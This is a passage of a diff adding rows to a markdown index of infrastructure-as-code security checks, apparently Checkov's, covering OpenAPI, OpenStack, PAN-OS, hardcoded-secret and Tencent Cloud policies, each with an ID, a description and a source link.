+| 3815 | CKV_OPENAPI_6            | resource                         | security                                                                                         | Ensure that security requirement defined in securityDefinitions - version 2.0 files                                                                                                                      | OpenAPI                 | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py)                                                                                            |
+| 3816 | CKV_OPENAPI_7            | resource                         | security                                                                                         | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files                                                             | OpenAPI                 | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py)                                                                                          |
+| 3817 | CKV_OPENAPI_8            | resource                         | security                                                                                         | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files                                                                                                           | OpenAPI                 | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py)                                                                              |
+| 3818 | CKV_OPENAPI_9            | resource                         | paths                                                                                            | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files                                                                                                         | OpenAPI                 | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py)                                                        |
+| 3819 | CKV_OPENAPI_10           | resource                         | paths                                                                                            | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files                                                                                                   | OpenAPI                 | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py)                                                                |
+| 3820 | CKV_OPENAPI_11           | resource                         | securityDefinitions                                                                              | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files                                                                                                   | OpenAPI                 | [Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py)                                                          |
+| 3821 | CKV_OPENAPI_12           | resource                         | securityDefinitions                                                                              | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files                                                                                                  | OpenAPI                 | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py)                                                          |
+| 3822 | CKV_OPENAPI_13           | resource                         | securityDefinitions                                                                              | Ensure security definitions do not use basic auth - version 2.0 files                                                                                                                                    | OpenAPI                 | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py)                                                                            |
+| 3823 | CKV_OPENAPI_14           | resource                         | paths                                                                                            | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files                                                                                                        | OpenAPI                 | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py)                                                                            |
+| 3824 | CKV_OPENAPI_15           | resource                         | paths                                                                                            | Ensure that operation objects do not use basic auth - version 2.0 files                                                                                                                                  | OpenAPI                 | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py)                                                                                  |
+| 3825 | CKV_OPENAPI_16           | resource                         | paths                                                                                            | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files                                                                                                       | OpenAPI                 | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py)                                                                  |
+| 3826 | CKV_OPENAPI_17           | resource                         | paths                                                                                            | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files                                                                                       | OpenAPI                 | [OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py)                                                                  |
+| 3827 | CKV_OPENAPI_18           | resource                         | schemes                                                                                          | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files                                                                                                                     | OpenAPI                 | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py)                                                                                      |
+| 3828 | CKV_OPENAPI_19           | resource                         | security                                                                                         | Ensure that global security scope is defined in securityDefinitions - version 2.0 files                                                                                                                  | OpenAPI                 | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py)                                                                          |
+| 3829 | CKV_OPENAPI_20           | resource                         | paths                                                                                            | Ensure that API keys are not sent over cleartext                                                                                                                                                         | OpenAPI                 | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py)                                                                                               |
+| 3830 | CKV_OPENAPI_21           | resource                         | paths                                                                                            | Ensure that arrays have a maximum number of items                                                                                                                                                        | OpenAPI                 | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py)                                                                                     |
+| 3831 | CKV_OPENSTACK_1          | provider                         | openstack                                                                                        | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider                                                                                                      | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py)                                                                                                   |
+| 3832 | CKV_OPENSTACK_2          | resource                         | openstack_compute_secgroup_v2                                                                    | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                                     |
+| 3833 | CKV_OPENSTACK_2          | resource                         | openstack_networking_secgroup_rule_v2                                                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                                     |
+| 3834 | CKV_OPENSTACK_3          | resource                         | openstack_compute_secgroup_v2                                                                    | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                                 |
+| 3835 | CKV_OPENSTACK_3          | resource                         | openstack_networking_secgroup_rule_v2                                                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                                 |
+| 3836 | CKV_OPENSTACK_4          | resource                         | openstack_compute_instance_v2                                                                    | Ensure that instance does not use basic credentials                                                                                                                                                      | Terraform               | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py)                                                                 |
+| 3837 | CKV_OPENSTACK_5          | resource                         | openstack_fw_rule_v1                                                                             | Ensure firewall rule set a destination IP                                                                                                                                                                | Terraform               | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py)                                                                 |
+| 3838 | CKV_PAN_1                | provider                         | panos                                                                                            | Ensure no hard coded PAN-OS credentials exist in provider                                                                                                                                                | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py)                                                                                                       |
+| 3839 | CKV_PAN_2                | resource                         | panos_management_profile                                                                         | Ensure plain-text management HTTP is not enabled for an Interface Management Profile                                                                                                                     | Terraform               | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py)                                                                         |
+| 3840 | CKV_PAN_2                | resource                         | tasks.paloaltonetworks.panos.panos_management_profile                                            | Ensure plain-text management HTTP is not enabled for an Interface Management Profile                                                                                                                     | Ansible                 | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml)                                                               |
+| 3841 | CKV_PAN_3                | resource                         | panos_management_profile                                                                         | Ensure plain-text management Telnet is not enabled for an Interface Management Profile                                                                                                                   | Terraform               | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py)                                                                     |
+| 3842 | CKV_PAN_3                | resource                         | tasks.paloaltonetworks.panos.panos_management_profile                                            | Ensure plain-text management Telnet is not enabled for an Interface Management Profile                                                                                                                   | Ansible                 | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml)                                                           |
+| 3843 | CKV_PAN_4                | resource                         | panos_security_policy                                                                            | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform               | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                                     |
+| 3844 | CKV_PAN_4                | resource                         | panos_security_rule_group                                                                        | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform               | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                                     |
+| 3845 | CKV_PAN_4                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Ansible                 | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml)                                                                                           |
+| 3846 | CKV_PAN_5                | resource                         | panos_security_policy                                                                            | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform               | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                                 |
+| 3847 | CKV_PAN_5                | resource                         | panos_security_rule_group                                                                        | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform               | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                                 |
+| 3848 | CKV_PAN_5                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'application' set to 'any'                                                                                                                                             | Ansible                 | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml)                                                                       |
+| 3849 | CKV_PAN_6                | resource                         | panos_security_policy                                                                            | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform               | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                         |
+| 3850 | CKV_PAN_6                | resource                         | panos_security_rule_group                                                                        | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform               | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                         |
+| 3851 | CKV_PAN_6                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'service' set to 'any'                                                                                                                                                 | Ansible                 | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml)                                                                               |
+| 3852 | CKV_PAN_7                | resource                         | panos_security_policy                                                                            | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform               | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                                     |
+| 3853 | CKV_PAN_7                | resource                         | panos_security_rule_group                                                                        | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform               | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                                     |
+| 3854 | CKV_PAN_7                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any'                                                                                                       | Ansible                 | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml)                                                                           |
+| 3855 | CKV_PAN_8                | resource                         | panos_security_policy                                                                            | Ensure description is populated within security policies                                                                                                                                                 | Terraform               | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                           |
+| 3856 | CKV_PAN_8                | resource                         | panos_security_rule_group                                                                        | Ensure description is populated within security policies                                                                                                                                                 | Terraform               | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                           |
+| 3857 | CKV_PAN_8                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure description is populated within security policies                                                                                                                                                 | Ansible                 | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml)                                                                                 |
+| 3858 | CKV_PAN_9                | resource                         | panos_security_policy                                                                            | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform               | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                                       |
+| 3859 | CKV_PAN_9                | resource                         | panos_security_rule_group                                                                        | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform               | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                                       |
+| 3860 | CKV_PAN_9                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Ansible                 | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml)                                                                             |
+| 3861 | CKV_PAN_10               | resource                         | panos_security_policy                                                                            | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform               | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                                     |
+| 3862 | CKV_PAN_10               | resource                         | panos_security_rule_group                                                                        | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform               | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                                     |
+| 3863 | CKV_PAN_10               | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure logging at session end is enabled within security policies                                                                                                                                        | Ansible                 | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml)                                                                           |
+| 3864 | CKV_PAN_11               | resource                         | panos_ipsec_crypto_profile                                                                       | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform               | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                                 |
+| 3865 | CKV_PAN_11               | resource                         | panos_panorama_ipsec_crypto_profile                                                              | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform               | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                                 |
+| 3866 | CKV_PAN_12               | resource                         | panos_ipsec_crypto_profile                                                                       | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform               | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                         |
+| 3867 | CKV_PAN_12               | resource                         | panos_panorama_ipsec_crypto_profile                                                              | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform               | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                         |
+| 3868 | CKV_PAN_12               | resource                         | tasks.paloaltonetworks.panos.panos_ipsec_profile                                                 | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Ansible                 | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml)                                                         |
+| 3869 | CKV_PAN_13               | resource                         | panos_ipsec_crypto_profile                                                                       | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform               | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                                   |
+| 3870 | CKV_PAN_13               | resource                         | panos_panorama_ipsec_crypto_profile                                                              | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform               | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                                   |
+| 3871 | CKV_PAN_13               | resource                         | tasks.paloaltonetworks.panos.panos_ipsec_profile                                                 | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Ansible                 | [PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml)                                                                                       |
+| 3872 | CKV_PAN_14               | resource                         | panos_panorama_zone                                                                              | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform               | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                                   |
+| 3873 | CKV_PAN_14               | resource                         | panos_zone                                                                                       | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform               | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                                   |
+| 3874 | CKV_PAN_14               | resource                         | panos_zone_entry                                                                                 | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform               | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                                   |
+| 3875 | CKV_PAN_14               | resource                         | tasks.paloaltonetworks.panos.panos_zone                                                          | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Ansible                 | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml)                                                                         |
+| 3876 | CKV_PAN_15               | resource                         | panos_panorama_zone                                                                              | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform               | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                                     |
+| 3877 | CKV_PAN_15               | resource                         | panos_zone                                                                                       | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform               | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                                     |
+| 3878 | CKV_PAN_15               | resource                         | tasks.paloaltonetworks.panos.panos_zone                                                          | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Ansible                 | [PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml)                                                                           |
+| 3879 | CKV_PAN_16               | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels                                                                               | Ansible                 | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml)                                                                         |
+| 3880 | CKV_PAN_17               | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any'                                                                                                   | Ansible                 | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml)                                                       |
+| 3881 | CKV_SECRET_1             | Artifactory Credentials          | secrets                                                                                          | Artifactory Credentials                                                                                                                                                                                  | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3882 | CKV_SECRET_2             | AWS Access Key                   | secrets                                                                                          | AWS Access Key                                                                                                                                                                                           | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3883 | CKV_SECRET_3             | Azure Storage Account access key | secrets                                                                                          | Azure Storage Account access key                                                                                                                                                                         | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3884 | CKV_SECRET_4             | Basic Auth Credentials           | secrets                                                                                          | Basic Auth Credentials                                                                                                                                                                                   | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3885 | CKV_SECRET_5             | Cloudant Credentials             | secrets                                                                                          | Cloudant Credentials                                                                                                                                                                                     | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3886 | CKV_SECRET_6             | Base64 High Entropy String       | secrets                                                                                          | Base64 High Entropy String                                                                                                                                                                               | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3887 | CKV_SECRET_7             | IBM Cloud IAM Key                | secrets                                                                                          | IBM Cloud IAM Key                                                                                                                                                                                        | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3888 | CKV_SECRET_8             | IBM COS HMAC Credentials         | secrets                                                                                          | IBM COS HMAC Credentials                                                                                                                                                                                 | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3889 | CKV_SECRET_9             | JSON Web Token                   | secrets                                                                                          | JSON Web Token                                                                                                                                                                                           | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3890 | CKV_SECRET_11            | Mailchimp Access Key             | secrets                                                                                          | Mailchimp Access Key                                                                                                                                                                                     | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3891 | CKV_SECRET_12            | NPM tokens                       | secrets                                                                                          | NPM tokens                                                                                                                                                                                               | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3892 | CKV_SECRET_13            | Private Key                      | secrets                                                                                          | Private Key                                                                                                                                                                                              | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3893 | CKV_SECRET_14            | Slack Token                      | secrets                                                                                          | Slack Token                                                                                                                                                                                              | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3894 | CKV_SECRET_15            | SoftLayer Credentials            | secrets                                                                                          | SoftLayer Credentials                                                                                                                                                                                    | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3895 | CKV_SECRET_16            | Square OAuth Secret              | secrets                                                                                          | Square OAuth Secret                                                                                                                                                                                      | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3896 | CKV_SECRET_17            | Stripe Access Key                | secrets                                                                                          | Stripe Access Key                                                                                                                                                                                        | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3897 | CKV_SECRET_18            | Twilio API Key                   | secrets                                                                                          | Twilio API Key                                                                                                                                                                                           | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3898 | CKV_SECRET_19            | Hex High Entropy String          | secrets                                                                                          | Hex High Entropy String                                                                                                                                                                                  | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                                       |
+| 3899 | CKV_TC_1                 | resource                         | tencentcloud_cbs_storage                                                                         | Ensure Tencent Cloud CBS is encrypted                                                                                                                                                                    | Terraform               | [CBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py)                                                                                            |
+| 3900 | CKV_TC_2                 | resource                         | tencentcloud_instance                                                                            | Ensure Tencent Cloud CVM instance does not allocate a public IP                                                                                                                                          | Terraform               | [CVMAllocatePublicIp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py)                                                                                |
+| 3901 | CKV_TC_3                 | resource                         | tencentcloud_instance                                                                            | Ensure Tencent Cloud CVM monitor service is enabled                                                                                                                                                      | Terraform               | [CVMDisableMonitorService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py)                                                                      |
+| 3902 | CKV_TC_4                 | resource                         | tencentcloud_instance                                                                            | Ensure Tencent Cloud CVM instances do not use the default security group                                                                                                                                 | Terraform               | [CVMUseDefaultSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py)                                                                  |
+| 3903 | CKV_TC_5                 | resource                         | tencentcloud_instance                                                                            | Ensure Tencent Cloud CVM instances do not use the default VPC                                                                                                                                            | Terraform               | [CVMUseDefaultVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py)                                                                                      |
+| 3904 | CKV_TC_6                 | resource                         | tencentcloud_kubernetes_cluster                                                                  | Ensure Tencent Cloud TKE clusters enable log agent                                                                                                                                                       | Terraform               | [TKELogAgentEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py)                                                                                  |
+| 3905 | CKV_TC_7                 | resource                         | tencentcloud_kubernetes_cluster                                                                  | Ensure Tencent Cloud TKE cluster is not assigned a public IP address                                                                                                                                     | Terraform               | [TKEPublicIpAssigned.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py)                                                                                |
+| 3906 | CKV_TC_8                 | resource                         | tencentcloud_security_group_rule_set                                                             | Ensure Tencent Cloud VPC security group rules do not accept all traffic                                                                                                                                  | Terraform               | [VPCSecurityGroupRuleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py)                                                                        |
